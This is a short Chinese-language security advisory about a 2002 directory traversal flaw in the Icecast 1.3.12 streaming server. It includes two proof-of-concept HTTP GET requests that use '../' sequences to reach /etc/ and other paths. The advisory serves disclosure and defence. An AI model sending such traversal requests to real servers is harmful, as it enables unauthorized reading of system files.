Icecast Server目录遍历信息泄露漏洞发布时间:2002-07-15 更新时间:2002-07-15 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5189 受影响系统 Icecast Icecast 1.3.12详细描述 Icecast是免费开放源代码音乐流服务程序,使用在多种系统平台下。 由于Icecast服务程序对用户提交的请求缺少过滤,攻击者可以进行目录遍历攻击。 测试代码 GET /file/../../../../../../../../nonexistent/ HTTP/1.0 GET /file/../../../../../../../../etc/ HTTP/1.0 解决方案 尚无 相关信息 glaive@VANED.NET. 参考:http://online.securityfocus.com/archive/82/281274 相关主页:http://www.icecast.org/ |